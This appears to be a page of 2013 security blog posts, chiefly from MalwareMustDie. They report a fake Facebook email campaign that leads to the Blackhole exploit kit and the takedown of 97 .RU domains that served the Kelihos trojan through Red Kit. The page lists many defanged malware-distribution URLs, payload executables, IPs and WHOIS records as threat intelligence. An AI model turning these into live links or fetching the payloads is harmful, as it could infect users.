Oh dear ... Yelena Mizulina out does Cameron!

Just when you thought it couldn't get stupider than Cameron' imposing of the smut ban in the UK, this Russian politico has decided to out-do Cameron in the "yep, we can be even more brainless!".

http://www.theregister.co.uk/2013/07/29/russia_to_ban_swearing_on_social_networks_good_luck/

This woman has clearly never seen some of the Russian and Ruskranian blackhat forums I monitor (or for that

Read More

[ALERT] Fake Google Chrome, and yet more malicious SysTweak shenanigans again

Looking up the POST beep codes for a Sony Vaio, led me to a thread on sevenforums.com a few minutes ago, which rather disgustingly (I'd say surprising, but I'm not surprised by SysTweaks ongoing badness anymore - they've been at it so long), led to 4 more examples, of misleading advertising, one belonging to Spark Trust, and 3 others belonging to SysTweak.

The first [1] of these, is at least

Read More

#Alert! #Facebook scam emails that will lead you to #Blackhole EK (162.216.18.169, GoDaddy/Linode)

Note: I wrote this post as a quick note to raise this threat's awareness, a warning note for Facebook users; Thus a PoC to be used as verdict for shutdown purpose of the related domain and IP, so I am sorry if you did not find any deep analysis this time.

We received tons of fake Facebook notification email spams with the three themes pattern: (1)Asking you about Facebook password changes, (2)"Your photo was tagged" notification and (3)Friend Request notification. I made snapshot of these threes as per below (please click to enlarge the pics):

These emails will trick you to click the below malware infection URLs with I pasted the recent ones only:

h00p://198.251.67.11/sonya/index.html
h00p://www.kauai2u.com/hiding/index.html
h00p://nendt.com/horded/index.html
h00p://whittakerwatertech.com/hewed/index.html
h00p://www.readingfluency.net/demising/index.html
h00p://adeseye.me.pn/saluted/index.html
h00p://www.bst-kanzlei.de/gist/index.html
h00p://www.discountprescriptions.pacificsocial.com/signally/index.html

What happen after you accessed those URL is, you will load the malicious JavaScript in the below URL:

h00p://traditionlagoonresort.com/prodded/televised.js

And you will be redirected to the Blackhole exploit Kit site here:

h00p://nphscards.com/topic/accidentally-results-stay.php

The browser will look like this upon redirection...

If we trail this threat further we will meet Trojan Zbot/Pony(Credential Stealer), MedFos(downloader) and Zero Access botnet which are served by this Blackhole.
Same infection chain lead to the same URL also verdicted malicious in here-->>[CLICK]

The Blackhole host itself is up and alive in the below domain and NS:

nphscards.com  A  162.216.18.169
nphscards.com  NS  ns30.domaincontrol.com
nphscards.com  NS  ns29.domaincontrol.com

You will see a long record of infection of this IP as per spotted in URLQuery here-->>[CLICK], with the pasted below:

2013-07-25 12:25:54 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 09:30:28 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 08:33:34 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 02:38:35 h00p://nphssoccercards.com [United States] 162.216.18.169
2013-07-25 01:07:51 h00p://nphssoccercards.com/favicon.ico [United States] 162.216.18.169
2013-07-25 01:05:34 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc [United States] 162.216.18.169
2013-07-25 01:03:43 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-25 00:15:33 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-25 00:12:25 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-25 00:11:30 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 00:04:06 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 23:43:58 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 22:49:27 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 22:14:26 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-24 22:02:13 h00p://2013vistakonpresidentsclub.com/ [United States] 162.216.18.169
2013-07-24 21:50:46 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 21:47:23 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 20:03:35 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 19:40:30 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 19:33:18 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53 (...) [United States] 162.216.18.169
2013-07-24 18:56:07 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfP (...) [United States] 162.216.18.169
2013-07-24 18:53:14 h00p://nphssoccercards.com [United States] 162.216.18.169
2013-07-24 18:25:56 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 18:13:21 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 17:53:12 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 17:17:24 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 16:40:13 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 16:29:31 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 13:18:30 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 12:29:44 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169

And also can be seen in Virus Total URL check here-->>[CLICK], pasted below as:

5/39 2013-07-25 09:17:49 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?ilhtELOHdpisFWs=YgItFHLgkO&JJfLXzq...
3/39 2013-07-25 07:05:13 h00p://2013vistakonpresidentsclub.com/topic/religiouss-selected.php
8/39 2013-07-25 06:05:45 h00p://nphssoccercards.com/adobe/update_flash_player.exe
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?ceJfcWErQTbG=kCwAByXBRdETOJ&tsDWPg=Rp...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?Ff=5656562e2i&Ce=2d2i562g552g2f572i54...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?jf=32542d2e2d&Be=2d2i562g552g2f572i54...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?TbcoUkQBgX=hGSiu&qhiHoQj=JBEYjg
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?ff=2g3131542j&ke=302g572f5352572i572f...
3/39 2013-07-25 04:01:30 h00p://nphscards.com/topic/accidentally-results-stay.php%27%3B
3/39 2013-07-25 03:49:25 h00p://2013vistakonpresidentsclub.com/topic/operation_statistic_objects.php
5/39 2013-07-25 01:22:26 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2e542f5452&ae=302g572f5352572i5...
5/39 2013-07-25 01:21:06 h00p://nphssoccercards.com/contacts.exe
5/38 2013-07-24 23:07:28 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc
8/38 2013-07-24 21:40:20 h00p://nphscards.com/adobe/update_flash_player.exe
7/39 2013-07-24 21:19:11 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php
2/38 2013-07-24 21:03:03 h00p://2013vistakonpresidentsclub.com/
4/39 2013-07-24 18:58:16 h00p://nphscards.com/topic/accidentally-results-stay.php
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?Rf=322e2i542f&fe=302g572f5352572i5...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?Kf=322e2i542f&xe=522e552d57552f305...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53525...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?KYdttLYSrKSgb=BcaETwRFtxefjW&UAoFL...
4/39 2013-07-24 18:05:46 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfPToik=52...
3/39 2013-07-24 17:20:55 h00p://nphssoccercards.com/adobe/adobe_files/mhtB264%281%29.tmp
2/39 2013-07-24 17:18:51 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php
2/39 2013-07-24 17:16:40 h00p://nphssoccercards.com/
2/39 2013-07-24 17:00:10 h00p://nphssoccercards.com/adobe/
2/39 2013-07-24 16:58:25 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfPToi...
2/39 2013-07-24 16:53:57 h00p://nphscards.com/
4/38 2013-07-24 16:18:14 h00p://nphscards.com/topic/accidentally-results-stay.php?mf=542h2i312h&Me=302g572f5352572i572f...
2/39 2013-07-24 15:18:08 h00p://nphssoccercards.com/forum/viewtopic.php
2/38 2013-07-24 15:07:48 h00p://nphssoccercards.com/topic/religiouss-selected.php
4/38 2013-07-23 23:10:24 h00p://nphscards.com/adobe 

More spotted malware infection:

@MalwareMustDie related to the #RoyalBaby campaign: hxxp://nphscards.com/adobe/update_flash_player.exe hxxp://nphssoccercards.com/^

— Darrel Rendell (@DarrelRendell) July 25, 2013

More information of "Royal Baby" scam is here-->>[Malekal]

Domain and IP Network information:

The below is the information of registrar and ISP that provides the IP for this infector:

// Domains & IP registration (for shutddown purpose)
// Is GoDaddy Domain in Linode network

  Domain Name: NPHSCARDS.COM
  Registrar: GODADDY.COM, LLC
  Whois Server: whois.godaddy.com
  Referral URL: http://registrar.godaddy.com
  Name Server: NS29.DOMAINCONTROL.COM
  Name Server: NS30.DOMAINCONTROL.COM
  Status: clientDeleteProhibited
  Status: clientRenewProhibited
  Status: clientTransferProhibited
  Status: clientUpdateProhibited
  Updated Date: 05-oct-2012
  Creation Date: 10-oct-2010
  Expiration Date: 10-oct-2013
  
NetRange:       162.216.16.0 - 162.216.19.255
CIDR:           162.216.16.0/22
OriginAS:
NetName:        LINODE-US
NetHandle:      NET-162-216-16-0-1
Parent:         NET-162-0-0-0-0
NetType:        Direct Allocation
RegDate:        2013-06-19
Updated:        2013-06-19
Ref:            http://whois.arin.net/rest/net/NET-162-216-16-0-1

OrgName:        Linode
OrgId:          LINOD
Address:        329 E. Jimmie Leeds Road
Address:        Suite A
City:           Galloway
StateProv:      NJ
PostalCode:     08205
Country:        US
RegDate:        2008-04-24
Updated:        2010-08-31
Comment:        http://www.linode.com
Ref:            http://whois.arin.net/rest/org/LINODE

Yes, we need GoDaddy cooperation to dismantle this domain to prevent further infection and Linote cooperration to clean up the host.

If you interested in investigation log, you can fetch it here-->>[Download]

Additional

The campaign still goes on, even now:

#MalwareMustDie! Today's fake #facebook notification to infect #malware via #Blackhole, see the IP, is still ALIVE! pic.twitter.com/i7aqdgWX5H

— MalwareMustDie, NPO (@MalwareMustDie) July 26, 2013

#MalwareMustDie!

Read More

Suspension announcement of 97 .RU domains (registered in REGGI.RU) used by Kelihos Crime Group to spread payload via Red Kit Exploit Pack

MalwareMustDie, NPO, during its research activities, is following the process of suspension malware bad domains as important milestones in malware fighting steps. is also publicly releasing some of suspension domains in the "Operation Tango Down" [What is TangoDown?] as a public announcement.

This time we are shutting down the Kelihos Trojan payload download server's used 97 .RU domains, which was distrubuted by the Red Kit Exploit Kit. All of the detected payload URL we registered them into URLQuery and summarize the URL used for infection by automation after all of the data finished to be registered. We thank you URLQuery for providing a good service that is helpful as evidence of crime for the further legal process. In this case we detected 150 URLs infection, under 97 .RU domains, some of the URLs are served under a subdomains. The usage of the DGA-like randomisation for the domain used for the payload is the MO of this distribution.

The Kelihos Trojan were distributed in (mainly) East European (Ukrainian, Latvia, Belarus, Russia) and Asia servers (Japan, Korea, Taiwan and Hongkong) as the secondary layers, with also using the scattered world wide hacked machines.

Verdict of Crime

The current report is a systematic process of a successful suspension process, as a good coordination between MalwareMustDie members and supporters who help spotted, analysed & reported the threat, our PiCs in Tango Team (thank's to ‏@DL for the hard work during holiday time) and the GroupIB who was performing an excellent coordination on dismantling the related domains to the related Russia registrar (REGGI.RU) suspension process. Overall time took 4d+ for the communication and confirmation process taken.

This wave of Red Kit Exploit Kit campaign using Kelihos as payload was spotted infecting world wide, with the help from our Japan team we have a strong evidence of this infection effort as per published in Operation Clean-up Japan (OCJP) in case #113 here-->>[OCJP-013] , on five domestic sites.

Those infection payload is as per below real sample captured below:

RedKit Redirection PoC Snapshot:
[1] [2] [3] [4] [5]

Based on the payloads above we seek and collected all of the payload servers for this shutdown purpose.

Tango Information

The payload URL is as per below long list, which will be followed by another long list of 97 dismantled domains:

Infection URL data:

// #MalwareMustDie! Kelihos payload URL via RedKit EK Infection
// Reference: http://unixfreaxjp.blogspot.jp/2013/07/ocjp-113redkit-exploit-kitkelihosvia.html
// Detection range: July 1st, 2013 - July 16, 2013
// 

// grep rasta*

0 / 3 [7]hxxp://131.155.81.158/rasta01.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/rasta01.exe Belarus 93.125.67.95
0 / 0 [9]hxxp://www.philchor-nb.de/demo/rasta01.exe Germany
0 / 2 [10]hxxp://ikqydkod.ru/rasta01.exe Ukraine 109.251.141.23
0 / 2 [11]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Russian Federation
0 / 6 [12]hxxp://bopefidi.ru/rasta01.exe Russian Federation 2.94.27.238
0 / 2 [13]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://sojouvyc.ru/rasta01.exe Ukraine 31.128.74.7
0 / 2 [15]hxxp://vadlubiq.ru/rasta01.exe Ukraine 109.162.84.6
0 / 2 [16]hxxp://kazlyjva.ru/rasta01.exe Malaysia 58.26.182.98
0 / 2 [17]hxxp://funfubap.ru/rasta01.exe Taiwan 114.35.239.185
0 / 2 [18]hxxp://goryzcob.ru/rasta01.exe Ukraine 109.87.254.247
0 / 2 [19]hxxp://motbajsi.ru/rasta01.exe Ukraine 91.196.61.56
0 / 6 [20]hxxp://xymkapaq.ru/rasta01.exe Latvia 89.201.53.86
0 / 2 [21]hxxp://hupjiwuc.ru/rasta01.exe Ukraine 195.114.156.254
0 / 6 [22]hxxp://runevfoh.ru/rasta01.exe Ukraine 5.248.34.57
0 / 2 [23]hxxp://virerceb.ru/rasta01.exe Argentina 190.227.181.203
0 / 6 [24]hxxp://xatzyjha.ru/rasta01.exe Taiwan 1.172.233.239
0 / 2 [25]hxxp://makgivus.ru/rasta01.exe Canada 99.250.218.131
0 / 2 [26]hxxp://avryjpet.ru/rasta01.exe Belarus 91.215.178.83
0 / 2 [27]hxxp://kyjaqcoz.ru/rasta01.exe Ukraine 213.231.52.44
0 / 2 [28]hxxp://bopefidi.ru/rasta01.exe Taiwan 111.255.72.1
0 / 6 [29]hxxp://ycsycxyd.ru/rasta01.exe Japan 118.104.77.165
0 / 2 [30]hxxp://gazgowry.ru/rasta01.exe Ukraine 77.122.55.112
0 / 2 [31]hxxp://vetarwep.ru/rasta01.exe Kazakhstan 176.222.169.243
0 / 6 [32]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Bulgaria 95.43.87.30
0 / 6 [33]hxxp://gulaxxax.ru/rasta01.exe Ukraine 31.42.69.61
0 / 6 [34]hxxp://onhugxic.ru/rasta01.exe Kazakhstan 109.239.45.48
0 / 2 [35]hxxp://ahfamzyk.ru/rasta01.exe Ukraine 178.150.33.194
0 / 6 [36]hxxp://sykevked.ru/rasta01.exe Ukraine 151.0.44.52
0 / 6 [37]hxxp://ydhicdor.ru/rasta01.exe Ukraine 78.30.249.126
0 / 1 [38]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.87.7.53
0 / 2 [39]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 188.231.173.99
0 / 6 [40]hxxp://kifectah.ru/rasta01.exe Japan 61.27.109.166
0 / 2 [41]hxxp://busasxyv.ru/rasta01.exe Belarus 37.215.87.61
0 / 6 [42]hxxp://yjnaqwew.ru/rasta01.exe Ukraine 93.77.96.252
0 / 6 [43]hxxp://xuktalez.ru/rasta01.exe Ukraine 176.106.211.135
0 / 2 [44]hxxp://ybtoptag.ru/rasta01.exe Latvia 89.191.110.59
0 / 2 [45]hxxp://lygyucce.ru/rasta01.exe Ukraine 94.178.78.102
0 / 6 [46]hxxp://taykenid.ru/rasta01.exe Ukraine 212.92.227.111
0 / 2 [47]hxxp://qeisybyg.ru/rasta01.exe Ukraine 109.251.2.33
0 / 6 [48]hxxp://taykenid.ru/rasta01.exe Ukraine 176.8.183.90
0 / 2 [49]hxxp://qeisybyg.ru/rasta01.exe Ukraine 77.87.156.180
0 / 2 [50]hxxp://bysjyhuf.ru/rasta01.exe Taiwan 1.173.164.63
0 / 6 [51]hxxp://najniner.ru/rasta01.exe Taiwan 114.40.130.52
0 / 4 [52]hxxp://193.105.134.189/rasta01.exe Sweden 193.105.134.189
0 / 6 [53]hxxp://dakacdyn.ru/rasta01.exe Ukraine 178.158.82.158
0 / 6 [54]hxxp://higrikpy.ru/rasta01.exe Belgium 85.26.38.155
0 / 2 [55]hxxp://dipteqna.ru/rasta01.exe Ukraine 109.87.32.180
0 / 6 [56]hxxp://kykywpik.ru/rasta01.exe Ukraine 5.1.13.86
0 / 2 [57]hxxp://cimmitic.ru/rasta01.exe Japan 118.237.85.238
0 / 2 [58]hxxp://ybtoptag.ru/rasta01.exe Belarus 91.215.178.235
0 / 6 [59]hxxp://suyzerew.ru/rasta01.exe Kazakhstan 178.91.37.180
0 / 6 [60]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 93.77.68.69
0 / 2 [61]hxxp://ynhazcel.ru/rasta01.exe Kazakhstan 2.133.226.218
0 / 6 [62]hxxp://aflyzkac.ru/rasta01.exe Ukraine 93.77.28.43
0 / 2 [63]hxxp://giktyxvu.ru/rasta01.exe Ukraine 188.190.42.32
0 / 4 [64]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 2 [65]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Ukraine 31.133.38.207
0 / 2 [66]hxxp://aflyzkac.ru/rasta01.exe Japan 210.148.165.67
0 / 6 [67]hxxp://giktyxvu.ru/rasta01.exe Ukraine 178.159.231.99
0 / 6 [68]hxxp://ybtoptag.ru/rasta01.exe Ukraine 89.252.33.161
0 / 6 [69]hxxp://dyvgigim.ru/rasta01.exe Ukraine 37.229.35.234
0 / 4 [70]hxxp://193.105.134.89/rasta01.exe Sweden 193.105.134.89
0 / 6 [71]hxxp://jehrecyp.ru/rasta01.exe Ukraine 188.230.9.64
0 / 2 [72]hxxp://aro0eq.hozfezbe.ru/rasta01.exe[/code] Ukraine
0 / 6 [73]hxxp://cyrkapov.ru/rasta01.exe Ukraine 176.8.183.90
0 / 6 [74]hxxp://niqtasoz.ru/rasta01.exe Ukraine 46.172.147.122
0 / 2 [75]hxxp://ginkyvub.ru/rasta01.exe Ukraine 93.77.84.22
0 / 2 [76]hxxp://tejjetzo.ru/rasta01.exe Moldova, Republic of
0 / 6 [77]hxxp://fafehwiz.ru/rasta01.exe Ukraine 178.150.115.215
0 / 2 [78]hxxp://yhzelbyp.ru/rasta01.exe Ukraine 37.57.24.238
0 / 2 [79]hxxp://ihurvyun.ru/rasta01.exe Ukraine 178.158.198.249
0 / 6 [80]hxxp://adtyuhuz.ru/rasta01.exe Russian Federation 128.73.7.18
0 / 2 [81]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Hong Kong 118.141.33.46
0 / 6 [82]hxxp://jehrecyp.ru/rasta01.exe Ukraine 91.200.138.241
0 / 7 [83]hxxp://tejjetzo.ru/rasta01.exe Ukraine 94.153.63.166
0 / 3 [84]hxxp://fafehwiz.ru/rasta01.exe Ukraine 81.163.152.32
0 / 3 [85]hxxp://yhzelbyp.ru/rasta01.exe Chile 186.36.204.152
0 / 7 [86]hxxp://adtyuhuz.ru/rasta01.exe Argentina 190.107.122.36
0 / 7 [87]hxxp://aggaxsef.ru/rasta01.exe Taiwan 1.173.221.95
0 / 3 [88]hxxp://bomuxvis.ru/rasta01.exe Taiwan 1.172.231.167
0 / 7 [89]hxxp://jehrecyp.ru/rasta01.exe Ukraine 178.150.57.167
0 / 7 [90]hxxp://xejabfom.ru/rasta01.exe Belarus 176.118.159.88
0 / 3 [91]hxxp://sapigrys.ru/rasta01.exe Ukraine 93.77.97.98
0 / 3 [92]hxxp://sodkanxo.ru/rasta01.exe Ukraine 77.122.55.156
0 / 7 [93]hxxp://aggaxsef.ru/rasta01.exe Ukraine 178.150.169.180
0 / 3 [94]hxxp://fafehwiz.ru/rasta01.exe Ukraine 89.162.163.66
0 / 3 [95]hxxp://zyvjofat.ru/rasta01.exe Taiwan 36.239.213.101
0 / 2 [96]hxxp://paxgeqjo.ru/rasta01.exe Israel 46.121.221.173
0 / 6 [97]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.95.246
0 / 2 [98]hxxp://hiznizoc.ru/rasta01.exe Korea, Republic of
0 / 2 [99]hxxp://lysopzoh.ru/rasta01.exe Ukraine 46.118.218.45
0 / 2 [100]hxxp://zyvjofat.ru/rasta01.exe Ukraine 178.150.192.214
0 / 2 [101]hxxp://xoqhozaz.ru/rasta01.exe Ukraine 109.162.96.64
0 / 2 [102]hxxp://hiznizoc.ru/rasta01.exe Ukraine 176.112.20.187
0 / 6 [103]hxxp://lysopzoh.ru/rasta01.exe Ukraine 93.175.234.62
0 / 6 [104]hxxp://zyvjofat.ru/rasta01.exe Ukraine 46.211.227.0
0 / 6 [105]hxxp://pywudcoz.ru/rasta01.exe Japan 180.14.61.59
0 / 6 [106]hxxp://izytexuf.ru/rasta01.exe Taiwan 123.194.247.85
0 / 6 [107]hxxp://izytexuf.ru/rasta01.exe Kazakhstan 2.132.145.189
0 / 6 [108]hxxp://usfezhyk.ru/rasta01.exe Ukraine 176.98.15.73
0 / 6 [109]hxxp://hipahsah.ru/rasta01.exe Belarus 134.17.112.99
0 / 6 [110]hxxp://talozzum.ru/rasta01.exe Ukraine 93.78.126.109
0 / 6 [111]hxxp://yrupxyen.ru/rasta01.exe Ukraine 5.105.21.178
0 / 6 [112]hxxp://nacwoman.ru/rasta01.exe Ukraine 109.251.74.37
0 / 2 [113]hxxp://libcikak.ru/rasta01.exe Japan 219.102.110.98
0 / 6 [114]hxxp://uphinjaq.ru/rasta01.exe Ukraine 151.0.5.20
0 / 6 [115]hxxp://aziwolge.ru/rasta01.exe Ukraine 151.0.38.74
0 / 6 [116]hxxp://kosnutef.ru/rasta01.exe Ukraine 93.79.38.73
0 / 6 [117]hxxp://kiyvryhy.ru/rasta01.exe Ukraine 80.77.44.150
0 / 2 [118]hxxp://oktizsez.ru/rasta01.exe Ukraine 91.227.207.89
0 / 6 [119]hxxp://uphinjaq.ru/rasta01.exe Ukraine 31.170.137.75
0 / 6 [120]hxxp://xaplovav.ru/rasta01.exe Ukraine 93.79.113.101
0 / 6 [121]hxxp://aziwolge.ru/rasta01.exe Ukraine 93.79.2.115
0 / 6 [122]hxxp://uphinjaq.ru/rasta01.exe Taiwan 114.25.156.106
0 / 6 [123]hxxp://xaplovav.ru/rasta01.exe Japan 123.225.106.205
0 / 6 [124]hxxp://oktizsez.ru/rasta01.exe Taiwan 111.252.191.134
0 / 6 [125]hxxp://kiyvryhy.ru/rasta01.exe Taiwan 124.11.195.73
0 / 2 [126]hxxp://sisvizub.ru/rasta01.exe Belarus 178.124.179.118
0 / 2 [127]hxxp://lymimnib.ru/rasta01.exe Ukraine 37.229.38.92
0 / 6 [128]hxxp://fugegwyf.ru/rasta01.exe Ukraine 159.224.94.242
0 / 2 [129]hxxp://fugegwyf.ru/rasta01.exe Russian Federation
0 / 2 [130]hxxp://urxibzep.ru/rasta01.exe Latvia 79.135.142.166
0 / 6 [131]hxxp://cibowjuv.ru/rasta01.exe Japan 219.173.80.25
0 / 6 [132]hxxp://pedtokid.ru/rasta01.exe Ukraine 188.231.173.99
0 / 2 [133]hxxp://bawoxgud.ru/rasta01.exe Ukraine 188.231.173.99

// grep userid*

0 / 3 [7]hxxp://131.155.81.158/userid2.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/userid2.exe Ukraine 89.252.33.161
0 / 2 [9]hxxp://ikqydkod.ru/userid2.exe Ukraine 178.137.38.18
0 / 1 [10]hxxp://ikqydkod.ru/ruserid2.exe Ukraine 176.8.183.137
0 / 6 [11]hxxp://xudsahbu.ru/userid2.exe Colombia 186.99.248.89
0 / 6 [12]hxxp://dypqysro.ru/userid2.exe Ukraine 212.79.121.221
0 / 6 [13]hxxp://uhipyvob.ru/userid2.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://jyuhysdo.ru/userid2.exe Ukraine 46.119.129.244
0 / 6 [15]hxxp://runevfoh.ru/userid2.exe Ukraine 46.211.249.42
0 / 6 [16]hxxp://hupjiwuc.ru/userid2.exe Ukraine 78.30.193.176
0 / 7 [17]hxxp://busasxyv.ru/userid2.exe Russian Federation 2.94.27.238
0 / 6 [18]hxxp://cypseguv.ru/userid2.exe Taiwan 124.12.91.243
0 / 3 [19]hxxp://78.83.177.242/userid2.exe Bulgaria 78.83.177.242
0 / 7 [20]hxxp://runevfoh.ru/userid2.exe Japan 123.176.141.183
0 / 6 [21]hxxp://confikja.ru/userid2.exe Ukraine 212.2.153.131
0 / 6 [22]hxxp://runevfoh.ru/userid2.exe Belarus 93.191.99.97
0 / 6 [23]hxxp://confikja.ru/userid2.exe Belarus 37.215.114.92
0 / 2 [24]hxxp://confikja.ru/userid2.exe Ukraine 109.87.181.75
0 / 6 [25]hxxp://tofhermi.ru/userid2.exe Ukraine 109.87.83.108
0 / 1 [26]hxxp://fafehwiz.ru/userid1.exe Ukraine 178.151.63.5
0 / 6 [27]hxxp://ybtoptag.ru/userid2.exe Ukraine 94.153.63.166
0 / 2 [28]hxxp://qeisybyg.ru/userid2.exe Russian Federation
0 / 2 [29]hxxp://mihumcuf.ru/userid2.exe Ukraine 77.122.68.176
0 / 1 [30]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.154.33.114
0 / 1 [31]hxxp://ollopdub.ru/userid1.exe Taiwan 114.27.25.145
0 / 1 [32]hxxp://fafehwiz.ru/userid1.exe Ukraine 159.224.8.181
0 / 1 [33]hxxp://ollopdub.ru/userid1.exe Ukraine 92.52.177.41
0 / 1 [34]hxxp://fafehwiz.ru/userid1.exe Ukraine 94.45.106.206
0 / 1 [35]hxxp://ollopdub.ru/userid1.exe Ukraine 109.162.41.226
0 / 1 [36]hxxp://fafehwiz.ru/userid1.exe India 49.206.161.32
0 / 1 [37]hxxp://pywudcoz.ru/userid1.exe Ukraine 93.78.79.28
0 / 1 [38]hxxp://ollopdub.ru/userid1.exe Hong Kong 223.19.195.162
0 / 1 [39]hxxp://ollopdub.ru/userid1.exe Ukraine 46.185.34.216
0 / 1 [40]hxxp://pywudcoz.ru/userid1.exe Russian Federation
0 / 1 [41]hxxp://hiznizoc.ru/userid1.exe Ukraine 87.244.169.104
0 / 1 [42]hxxp://ollopdub.ru/userid1.exe Macedonia 146.255.91.19
0 / 1 [43]hxxp://hiznizoc.ru/userid1.exe Ukraine 176.36.152.60
0 / 1 [44]hxxp://ollopdub.ru/userid1.exe Ukraine 37.143.93.132
0 / 1 [45]hxxp://kosnutef.ru/userid1.exe Ukraine 176.111.35.196
0 / 6 [46]hxxp://acaqizwy.ru/userid1.exe Taiwan 61.227.163.213
0 / 2 [47]hxxp://lymimnib.ru/userid1.exe Ukraine 176.103.208.105
0 / 2 [48]hxxp://sisvizub.ru/userid1.exe Ukraine 178.150.212.143
0 / 3 [49]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [50]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 3 [51]hxxp://78.83.177.242/userid1.exe Bulgaria 78.83.177.242
0 / 2 [52]hxxp://ankoweco.ru/userid1.exe Poland 79.135.180.94
0 / 2 [53]hxxp://uxmadjox.ru/userid1.exe Poland 86.63.98.141

---
#MalwareMustDie! $ date
Tue Jul 16 22:14:11 JST 2013

The domain list and UP IP's as per Fri Jul 19 20:01:00 JST 2013 status during the shutdown process

uhipyvob.ru,178.150.17.118,
ollopdub.ru,176.8.3.144,
fafehwiz.ru,91.217.58.74,
fuhxodyz.ru,77.122.197.86,
ikqydkod.ru,37.229.144.253,
bopefidi.ru,118.34.132.154,
ycsycxyd.ru,95.140.214.250,
sojouvyc.ru,188.129.218.87,
vadlubiq.ru,178.93.135.94,
kazlyjva.ru,109.162.94.114,
funfubap.ru,213.37.166.193,
goryzcob.ru,213.37.166.193,
motbajsi.ru,178.158.158.182,
xymkapaq.ru,93.185.219.213,
runevfoh.ru,89.215.115.4,
virerceb.ru,94.153.36.164,
xatzyjha.ru,93.79.152.211,
makgivus.ru,79.135.211.87,
avryjpet.ru,178.211.105.168,
kyjaqcoz.ru,46.119.144.106,
hiznizoc.ru,46.250.7.179,
giktyxvu.ru,77.123.79.211,
ynhazcel.ru,178.172.246.30,
gazgowry.ru,93.89.208.202,
vetarwep.ru,5.248.164.41,
gulaxxax.ru,46.119.144.106,
onhugxic.ru,109.251.126.26,
ahfamzyk.ru,46.49.47.254,
sykevked.ru,93.77.96.252,
ydhicdor.ru,94.137.172.44,
kifectah.ru,109.122.40.111,
busasxyv.ru,77.121.199.73,
yjnaqwew.ru,77.121.255.183,
xuktalez.ru,91.123.150.115,
lygyucce.ru,94.158.74.230,
taykenid.ru,109.108.252.136,
bysjyhuf.ru,5.1.22.63,
